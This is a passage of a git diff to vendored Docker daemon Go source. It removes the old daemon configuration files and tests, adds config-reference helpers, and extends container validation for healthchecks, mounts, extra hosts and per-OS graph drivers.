-	config.InstallCommonUnixFlags(flags)
-
-	// Then platform-specific install flags
-	config.attachExperimentalFlags(flags)
-}
-
-func (config *Config) isSwarmCompatible() error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go
deleted file mode 100644
index 90f6a1277f..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_test.go
+++ /dev/null
@@ -1,229 +0,0 @@
-package daemon
-
-import (
-	"io/ioutil"
-	"os"
-	"runtime"
-	"strings"
-	"testing"
-
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/spf13/pflag"
-)
-
-func TestDaemonConfigurationNotFound(t *testing.T) {
-	_, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker")
-	if err == nil || !os.IsNotExist(err) {
-		t.Fatalf("expected does not exist error, got %v", err)
-	}
-}
-
-func TestDaemonBrokenConfiguration(t *testing.T) {
-	f, err := ioutil.TempFile("", "docker-config-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	configFile := f.Name()
-	f.Write([]byte(`{"Debug": tru`))
-	f.Close()
-
-	_, err = MergeDaemonConfigurations(&Config{}, nil, configFile)
-	if err == nil {
-		t.Fatalf("expected error, got %v", err)
-	}
-}
-
-func TestParseClusterAdvertiseSettings(t *testing.T) {
-	if runtime.GOOS == "solaris" {
-		t.Skip("ClusterSettings not supported on Solaris\n")
-	}
-	_, err := parseClusterAdvertiseSettings("something", "")
-	if err != errDiscoveryDisabled {
-		t.Fatalf("expected discovery disabled error, got %v\n", err)
-	}
-
-	_, err = parseClusterAdvertiseSettings("", "something")
-	if err == nil {
-		t.Fatalf("expected discovery store error, got %v\n", err)
-	}
-
-	_, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080")
-	if err != nil {
-		t.Fatal(err)
-	}
-}
-
-func TestFindConfigurationConflicts(t *testing.T) {
-	config := map[string]interface{}{"authorization-plugins": "foobar"}
-	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
-
-	flags.String("authorization-plugins", "", "")
-	assert.NilError(t, flags.Set("authorization-plugins", "asdf"))
-
-	assert.Error(t,
-		findConfigurationConflicts(config, flags),
-		"authorization-plugins: (from flag: asdf, from file: foobar)")
-}
-
-func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) {
-	config := map[string]interface{}{"hosts": []string{"qwer"}}
-	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
-
-	var hosts []string
-	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to")
-	assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444"))
-	assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock"))
-
-	assert.Error(t, findConfigurationConflicts(config, flags), "hosts")
-}
-
-func TestDaemonConfigurationMergeConflicts(t *testing.T) {
-	f, err := ioutil.TempFile("", "docker-config-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	configFile := f.Name()
-	f.Write([]byte(`{"debug": true}`))
-	f.Close()
-
-	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
-	flags.Bool("debug", false, "")
-	flags.Set("debug", "false")
-
-	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-	if !strings.Contains(err.Error(), "debug") {
-		t.Fatalf("expected debug conflict, got %v", err)
-	}
-}
-
-func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) {
-	f, err := ioutil.TempFile("", "docker-config-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	configFile := f.Name()
-	f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`))
-	f.Close()
-
-	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
-	flags.String("tlscacert", "", "")
-	flags.Set("tlscacert", "~/.docker/ca.pem")
-
-	_, err = MergeDaemonConfigurations(&Config{}, flags, configFile)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-	if !strings.Contains(err.Error(), "tlscacert") {
-		t.Fatalf("expected tlscacert conflict, got %v", err)
-	}
-}
-
-func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) {
-	config := map[string]interface{}{"tls-verify": "true"}
-	flags := pflag.NewFlagSet("test", pflag.ContinueOnError)
-
-	flags.Bool("tlsverify", false, "")
-	err := findConfigurationConflicts(config, flags)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-	if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") {
-		t.Fatalf("expected tls-verify conflict, got %v", err)
-	}
-}
-
-func TestFindConfigurationConflictsWithMergedValues(t *testing.T) {
-	var hosts []string
-	config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"}
-	flags := pflag.NewFlagSet("base", pflag.ContinueOnError)
-	flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "")
-
-	err := findConfigurationConflicts(config, flags)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	flags.Set("host", "unix:///var/run/docker.sock")
-	err = findConfigurationConflicts(config, flags)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-	if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") {
-		t.Fatalf("expected hosts conflict, got %v", err)
-	}
-}
-
-func TestValidateConfiguration(t *testing.T) {
-	c1 := &Config{
-		CommonConfig: CommonConfig{
-			Labels: []string{"one"},
-		},
-	}
-
-	err := ValidateConfiguration(c1)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-
-	c2 := &Config{
-		CommonConfig: CommonConfig{
-			Labels: []string{"one=two"},
-		},
-	}
-
-	err = ValidateConfiguration(c2)
-	if err != nil {
-		t.Fatalf("expected no error, got error %v", err)
-	}
-
-	c3 := &Config{
-		CommonConfig: CommonConfig{
-			DNS: []string{"1.1.1.1"},
-		},
-	}
-
-	err = ValidateConfiguration(c3)
-	if err != nil {
-		t.Fatalf("expected no error, got error %v", err)
-	}
-
-	c4 := &Config{
-		CommonConfig: CommonConfig{
-			DNS: []string{"1.1.1.1o"},
-		},
-	}
-
-	err = ValidateConfiguration(c4)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-
-	c5 := &Config{
-		CommonConfig: CommonConfig{
-			DNSSearch: []string{"a.b.c"},
-		},
-	}
-
-	err = ValidateConfiguration(c5)
-	if err != nil {
-		t.Fatalf("expected no error, got error %v", err)
-	}
-
-	c6 := &Config{
-		CommonConfig: CommonConfig{
-			DNSSearch: []string{"123456"},
-		},
-	}
-
-	err = ValidateConfiguration(c6)
-	if err == nil {
-		t.Fatal("expected error, got nil")
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go
deleted file mode 100644
index d0957884b3..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_unix.go
+++ /dev/null
@@ -1,104 +0,0 @@
-// +build linux freebsd
-
-package daemon
-
-import (
-	"fmt"
-
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	units "github.com/docker/go-units"
-	"github.com/spf13/pflag"
-)
-
-var (
-	defaultPidFile  = "/var/run/docker.pid"
-	defaultGraph    = "/var/lib/docker"
-	defaultExecRoot = "/var/run/docker"
-)
-
-// Config defines the configuration of a docker daemon.
-// It includes json tags to deserialize configuration from a file
-// using the same names that the flags in the command line uses.
-type Config struct {
-	CommonConfig
-
-	// These fields are common to all unix platforms.
-	CommonUnixConfig
-
-	// Fields below here are platform specific.
-	CgroupParent         string                   `json:"cgroup-parent,omitempty"`
-	EnableSelinuxSupport bool                     `json:"selinux-enabled,omitempty"`
-	RemappedRoot         string                   `json:"userns-remap,omitempty"`
-	Ulimits              map[string]*units.Ulimit `json:"default-ulimits,omitempty"`
-	CPURealtimePeriod    int64                    `json:"cpu-rt-period,omitempty"`
-	CPURealtimeRuntime   int64                    `json:"cpu-rt-runtime,omitempty"`
-	OOMScoreAdjust       int                      `json:"oom-score-adjust,omitempty"`
-	Init                 bool                     `json:"init,omitempty"`
-	InitPath             string                   `json:"init-path,omitempty"`
-	SeccompProfile       string                   `json:"seccomp-profile,omitempty"`
-}
-
-// bridgeConfig stores all the bridge driver specific
-// configuration.
-type bridgeConfig struct {
-	commonBridgeConfig
-
-	// These fields are common to all unix platforms.
-	commonUnixBridgeConfig
-
-	// Fields below here are platform specific.
-	EnableIPv6          bool   `json:"ipv6,omitempty"`
-	EnableIPTables      bool   `json:"iptables,omitempty"`
-	EnableIPForward     bool   `json:"ip-forward,omitempty"`
-	EnableIPMasq        bool   `json:"ip-masq,omitempty"`
-	EnableUserlandProxy bool   `json:"userland-proxy,omitempty"`
-	UserlandProxyPath   string `json:"userland-proxy-path,omitempty"`
-	FixedCIDRv6         string `json:"fixed-cidr-v6,omitempty"`
-}
-
-// InstallFlags adds flags to the pflag.FlagSet to configure the daemon
-func (config *Config) InstallFlags(flags *pflag.FlagSet) {
-	// First handle install flags which are consistent cross-platform
-	config.InstallCommonFlags(flags)
-
-	// Then install flags common to unix platforms
-	config.InstallCommonUnixFlags(flags)
-
-	config.Ulimits = make(map[string]*units.Ulimit)
-
-	// Then platform-specific install flags
-	flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support")
-	flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers")
-	flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules")
-	flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward")
-	flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading")
-	flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking")
-	flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files")
-	flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs")
-	flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic")
-	flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary")
-	flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by --api-cors-header")
-	flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header")
-	flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers")
-	flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces")
-	flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket")
-	flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running")
-	flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon")
-	flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes")
-	flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary")
-	flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds")
-	flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds")
-	flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile")
-
-	config.attachExperimentalFlags(flags)
-}
-
-func (config *Config) isSwarmCompatible() error {
-	if config.ClusterStore != "" || config.ClusterAdvertise != "" {
-		return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode")
-	}
-	if config.LiveRestoreEnabled {
-		return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode")
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go
deleted file mode 100644
index 86c16f57ba..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_unix_test.go
+++ /dev/null
@@ -1,80 +0,0 @@
-// +build !windows
-
-package daemon
-
-import (
-	"io/ioutil"
-	"testing"
-)
-
-func TestDaemonConfigurationMerge(t *testing.T) {
-	f, err := ioutil.TempFile("", "docker-config-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	configFile := f.Name()
-
-	f.Write([]byte(`
-		{
-			"debug": true,
-			"default-ulimits": {
-				"nofile": {
-					"Name": "nofile",
-					"Hard": 2048,
-					"Soft": 1024
-				}
-			},
-			"log-opts": {
-				"tag": "test_tag"
-			}
-		}`))
-
-	f.Close()
-
-	c := &Config{
-		CommonConfig: CommonConfig{
-			AutoRestart: true,
-			LogConfig: LogConfig{
-				Type:   "syslog",
-				Config: map[string]string{"tag": "test"},
-			},
-		},
-	}
-
-	cc, err := MergeDaemonConfigurations(c, nil, configFile)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !cc.Debug {
-		t.Fatalf("expected %v, got %v\n", true, cc.Debug)
-	}
-	if !cc.AutoRestart {
-		t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart)
-	}
-	if cc.LogConfig.Type != "syslog" {
-		t.Fatalf("expected syslog config, got %q\n", cc.LogConfig)
-	}
-
-	if configValue, OK := cc.LogConfig.Config["tag"]; !OK {
-		t.Fatal("expected syslog config attributes, got nil\n")
-	} else {
-		if configValue != "test_tag" {
-			t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue)
-		}
-	}
-
-	if cc.Ulimits == nil {
-		t.Fatal("expected default ulimit config, got nil\n")
-	} else {
-		if _, OK := cc.Ulimits["nofile"]; OK {
-			if cc.Ulimits["nofile"].Name != "nofile" ||
-				cc.Ulimits["nofile"].Hard != 2048 ||
-				cc.Ulimits["nofile"].Soft != 1024 {
-				t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft)
-			}
-		} else {
-			t.Fatal("expected default ulimit name nofile, got nil\n")
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go
deleted file mode 100644
index df59dcf302..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_windows.go
+++ /dev/null
@@ -1,71 +0,0 @@
-package daemon
-
-import (
-	"os"
-	"path/filepath"
-
-	"github.com/docker/docker/api/types"
-	"github.com/spf13/pflag"
-)
-
-var (
-	defaultPidFile string
-	defaultGraph   = filepath.Join(os.Getenv("programdata"), "docker")
-)
-
-// bridgeConfig stores all the bridge driver specific
-// configuration.
-type bridgeConfig struct {
-	commonBridgeConfig
-}
-
-// Config defines the configuration of a docker daemon.
-// These are the configuration settings that you pass
-// to the docker daemon when you launch it with say: `docker daemon -e windows`
-type Config struct {
-	CommonConfig
-
-	// Fields below here are platform specific. (There are none presently
-	// for the Windows daemon.)
-}
-
-// InstallFlags adds flags to the pflag.FlagSet to configure the daemon
-func (config *Config) InstallFlags(flags *pflag.FlagSet) {
-	// First handle install flags which are consistent cross-platform
-	config.InstallCommonFlags(flags)
-
-	// Then platform-specific install flags.
-	flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs")
-	flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch")
-	flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe")
-}
-
-// GetRuntime returns the runtime path and arguments for a given
-// runtime name
-func (config *Config) GetRuntime(name string) *types.Runtime {
-	return nil
-}
-
-// GetInitPath returns the configure docker-init path
-func (config *Config) GetInitPath() string {
-	return ""
-}
-
-// GetDefaultRuntimeName returns the current default runtime
-func (config *Config) GetDefaultRuntimeName() string {
-	return stockRuntimeName
-}
-
-// GetAllRuntimes returns a copy of the runtimes map
-func (config *Config) GetAllRuntimes() map[string]types.Runtime {
-	return map[string]types.Runtime{}
-}
-
-// GetExecRoot returns the user configured Exec-root
-func (config *Config) GetExecRoot() string {
-	return ""
-}
-
-func (config *Config) isSwarmCompatible() error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go
deleted file mode 100644
index 4a7b95c17d..0000000000
--- a/vendor/github.com/docker/docker/daemon/config_windows_test.go
+++ /dev/null
@@ -1,59 +0,0 @@
-// +build windows
-
-package daemon
-
-import (
-	"io/ioutil"
-	"testing"
-)
-
-func TestDaemonConfigurationMerge(t *testing.T) {
-	f, err := ioutil.TempFile("", "docker-config-")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	configFile := f.Name()
-
-	f.Write([]byte(`
-		{
-			"debug": true,
-			"log-opts": {
-				"tag": "test_tag"
-			}
-		}`))
-
-	f.Close()
-
-	c := &Config{
-		CommonConfig: CommonConfig{
-			AutoRestart: true,
-			LogConfig: LogConfig{
-				Type:   "syslog",
-				Config: map[string]string{"tag": "test"},
-			},
-		},
-	}
-
-	cc, err := MergeDaemonConfigurations(c, nil, configFile)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if !cc.Debug {
-		t.Fatalf("expected %v, got %v\n", true, cc.Debug)
-	}
-	if !cc.AutoRestart {
-		t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart)
-	}
-	if cc.LogConfig.Type != "syslog" {
-		t.Fatalf("expected syslog config, got %q\n", cc.LogConfig)
-	}
-
-	if configValue, OK := cc.LogConfig.Config["tag"]; !OK {
-		t.Fatal("expected syslog config attributes, got nil\n")
-	} else {
-		if configValue != "test_tag" {
-			t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/configs.go b/vendor/github.com/docker/docker/daemon/configs.go
new file mode 100644
index 0000000000..4fd0d2272c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/configs.go
@@ -0,0 +1,21 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	"github.com/sirupsen/logrus"
+)
+
+// SetContainerConfigReferences sets the container config references needed
+func (daemon *Daemon) SetContainerConfigReferences(name string, refs []*swarmtypes.ConfigReference) error {
+	if !configsSupported() && len(refs) > 0 {
+		logrus.Warn("configs are not supported on this platform")
+		return nil
+	}
+
+	c, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+	c.ConfigReferences = append(c.ConfigReferences, refs...)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/configs_linux.go b/vendor/github.com/docker/docker/daemon/configs_linux.go
new file mode 100644
index 0000000000..ceb666337c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/configs_linux.go
@@ -0,0 +1,5 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+func configsSupported() bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/daemon/configs_unsupported.go b/vendor/github.com/docker/docker/daemon/configs_unsupported.go
new file mode 100644
index 0000000000..ae6f14f54e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/configs_unsupported.go
@@ -0,0 +1,7 @@
+// +build !linux,!windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+func configsSupported() bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/configs_windows.go b/vendor/github.com/docker/docker/daemon/configs_windows.go
new file mode 100644
index 0000000000..ceb666337c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/configs_windows.go
@@ -0,0 +1,5 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+func configsSupported() bool {
+	return true
+}
diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go
index 2a44800098..c8e2053970 100644
--- a/vendor/github.com/docker/docker/daemon/container.go
+++ b/vendor/github.com/docker/docker/daemon/container.go
@@ -1,22 +1,29 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 	"os"
+	"path"
 	"path/filepath"
+	"runtime"
+	"strings"
 	"time"
 
-	"github.com/docker/docker/api/errors"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/strslice"
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/network"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/image"
+	"github.com/docker/docker/opts"
 	"github.com/docker/docker/pkg/signal"
 	"github.com/docker/docker/pkg/system"
 	"github.com/docker/docker/pkg/truncindex"
-	"github.com/docker/docker/runconfig/opts"
+	"github.com/docker/docker/runconfig"
+	volumemounts "github.com/docker/docker/volume/mounts"
 	"github.com/docker/go-connections/nat"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
 )
 
 // GetContainer looks for a container using the provided information, which could be
@@ -28,7 +35,7 @@ import (
 //  If none of these searches succeed, an error is returned
 func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) {
 	if len(prefixOrName) == 0 {
-		return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied"))
+		return nil, errors.WithStack(invalidIdentifier(prefixOrName))
 	}
 
 	if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil {
@@ -46,14 +53,23 @@ func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, e
 	if indexError != nil {
 		// When truncindex defines an error type, use that instead
 		if indexError == truncindex.ErrNotExist {
-			err := fmt.Errorf("No such container: %s", prefixOrName)
-			return nil, errors.NewRequestNotFoundError(err)
+			return nil, containerNotFound(prefixOrName)
 		}
-		return nil, indexError
+		return nil, errdefs.System(indexError)
 	}
 	return daemon.containers.Get(containerID), nil
 }
 
+// checkContainer make sure the specified container validates the specified conditions
+func (daemon *Daemon) checkContainer(container *container.Container, conditions ...func(*container.Container) error) error {
+	for _, condition := range conditions {
+		if err := condition(container); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
 // Exists returns a true if a container of the specified ID or name exists,
 // false otherwise.
 func (daemon *Daemon) Exists(id string) bool {
@@ -79,6 +95,9 @@ func (daemon *Daemon) load(id string) (*container.Container, error) {
 	if err := container.FromDisk(); err != nil {
 		return nil, err
 	}
+	if err := label.ReserveLabel(container.ProcessLabel); err != nil {
+		return nil, err
+	}
 
 	if container.ID != id {
 		return container, fmt.Errorf("Container %s is stored at %s", container.ID, id)
@@ -96,13 +115,17 @@ func (daemon *Daemon) Register(c *container.Container) error {
 		c.StreamConfig.NewNopInputPipe()
 	}
 
+	// once in the memory store it is visible to other goroutines
+	// grab a Lock until it has been checkpointed to avoid races
+	c.Lock()
+	defer c.Unlock()
+
 	daemon.containers.Add(c.ID, c)
 	daemon.idIndex.Add(c.ID)
-
-	return nil
+	return c.CheckpointTo(daemon.containersReplica)
 }
 
-func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) {
+func (daemon *Daemon) newContainer(name string, operatingSystem string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) {
 	var (
 		id             string
 		err            error
@@ -117,7 +140,7 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h
 		if config.Hostname == "" {
 			config.Hostname, err = os.Hostname()
 			if err != nil {
-				return nil, err
+				return nil, errdefs.System(err)
 			}
 		}
 	} else {
@@ -135,8 +158,8 @@ func (daemon *Daemon) newContainer(name string, config *containertypes.Config, h
 	base.ImageID = imgID
 	base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName}
 	base.Name = name
-	base.Driver = daemon.GraphDriverName()
-
+	base.Driver = daemon.imageService.GraphDriverForOS(operatingSystem)
+	base.OS = operatingSystem
 	return base, err
 }
 
@@ -149,7 +172,7 @@ func (daemon *Daemon) GetByName(name string) (*container.Container, error) {
 	if name[0] != '/' {
 		fullName = "/" + name
 	}
-	id, err := daemon.nameIndex.Get(fullName)
+	id, err := daemon.containersReplica.Snapshot().GetID(fullName)
 	if err != nil {
 		return nil, fmt.Errorf("Could not find entity for %s", name)
 	}
@@ -183,7 +206,7 @@ func (daemon *Daemon) generateHostname(id string, config *containertypes.Config)
 func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error {
 	container.Lock()
 	defer container.Unlock()
-	return parseSecurityOpt(container, hostConfig)
+	return daemon.parseSecurityOpt(container, hostConfig)
 }
 
 func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error {
@@ -201,25 +224,31 @@ func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *
 		return err
 	}
 
-	// make sure links is not nil
-	// this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links
-	if hostConfig.Links == nil {
-		hostConfig.Links = []string{}
-	}
-
+	runconfig.SetDefaultNetModeIfBlank(hostConfig)
 	container.HostConfig = hostConfig
-	return container.ToDisk()
+	return container.CheckpointTo(daemon.containersReplica)
 }
 
 // verifyContainerSettings performs validation of the hostconfig and config
 // structures.
-func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
-
+func (daemon *Daemon) verifyContainerSettings(platform string, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
 	// First perform verification of settings common across all platforms.
 	if config != nil {
 		if config.WorkingDir != "" {
-			config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics
-			if !system.IsAbs(config.WorkingDir) {
+			wdInvalid := false
+			if runtime.GOOS == platform {
+				config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics
+				if !system.IsAbs(config.WorkingDir) {
+					wdInvalid = true
+				}
+			} else {
+				// LCOW. Force Unix semantics
+				config.WorkingDir = strings.Replace(config.WorkingDir, string(os.PathSeparator), "/", -1)
+				if !path.IsAbs(config.WorkingDir) {
+					wdInvalid = true
+				}
+			}
+			if wdInvalid {
 				return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir)
 			}
 		}
@@ -237,6 +266,25 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon
 				return nil, err
 			}
 		}
+
+		// Validate the healthcheck params of Config
+		if config.Healthcheck != nil {
+			if config.Healthcheck.Interval != 0 && config.Healthcheck.Interval < containertypes.MinimumDuration {
+				return nil, errors.Errorf("Interval in Healthcheck cannot be less than %s", containertypes.MinimumDuration)
+			}
+
+			if config.Healthcheck.Timeout != 0 && config.Healthcheck.Timeout < containertypes.MinimumDuration {
+				return nil, errors.Errorf("Timeout in Healthcheck cannot be less than %s", containertypes.MinimumDuration)
+			}
+
+			if config.Healthcheck.Retries < 0 {
+				return nil, errors.Errorf("Retries in Healthcheck cannot be negative")
+			}
+
+			if config.Healthcheck.StartPeriod != 0 && config.Healthcheck.StartPeriod < containertypes.MinimumDuration {
+				return nil, errors.Errorf("StartPeriod in Healthcheck cannot be less than %s", containertypes.MinimumDuration)
+			}
+		}
 	}
 
 	if hostConfig == nil {
@@ -244,18 +292,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon
 	}
 
 	if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
-		return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy")
+		return nil, errors.Errorf("can't create 'AutoRemove' container with restart policy")
+	}
+
+	// Validate mounts; check if host directories still exist
+	parser := volumemounts.NewParser(platform)
+	for _, cfg := range hostConfig.Mounts {
+		if err := parser.ValidateMountConfig(&cfg); err != nil {
+			return nil, err
+		}
+	}
+
+	for _, extraHost := range hostConfig.ExtraHosts {
+		if _, err := opts.ValidateExtraHost(extraHost); err != nil {
+			return nil, err
+		}
 	}
 
 	for port := range hostConfig.PortBindings {
 		_, portStr := nat.SplitProtoPort(string(port))
 		if _, err := nat.ParsePort(portStr); err != nil {
-			return nil, fmt.Errorf("invalid port specification: %q", portStr)
+			return nil, errors.Errorf("invalid port specification: %q", portStr)
 		}
 		for _, pb := range hostConfig.PortBindings[port] {
 			_, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort))
 			if err != nil {
-				return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort)
+				return nil, errors.Errorf("invalid port specification: %q", pb.HostPort)
 			}
 		}
 	}
@@ -265,18 +327,32 @@ func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostCon
 	switch p.Name {
 	case "always", "unless-stopped", "no":
 		if p.MaximumRetryCount != 0 {
-			return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name)
+			return nil, errors.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name)
 		}
 	case "on-failure":
 		if p.MaximumRetryCount < 0 {
-			return nil, fmt.Errorf("maximum retry count cannot be negative")
+			return nil, errors.Errorf("maximum retry count cannot be negative")
 		}
 	case "":
-	// do nothing
+		// do nothing
 	default:
-		return nil, fmt.Errorf("invalid restart policy '%s'", p.Name)
+		return nil, errors.Errorf("invalid restart policy '%s'", p.Name)
+	}
+
+	if !hostConfig.Isolation.IsValid() {
+		return nil, errors.Errorf("invalid isolation '%s' on %s", hostConfig.Isolation, runtime.GOOS)
 	}
 
+	var (
+		err      error
+		warnings []string
+	)
 	// Now do platform-specific verification
-	return verifyPlatformContainerSettings(daemon, hostConfig, config, update)
+	if warnings, err = verifyPlatformContainerSettings(daemon, hostConfig, config, update); err != nil {
+		return warnings, err
+	}
+	if hostConfig.NetworkMode.IsHost() && len(hostConfig.PortBindings) > 0 {
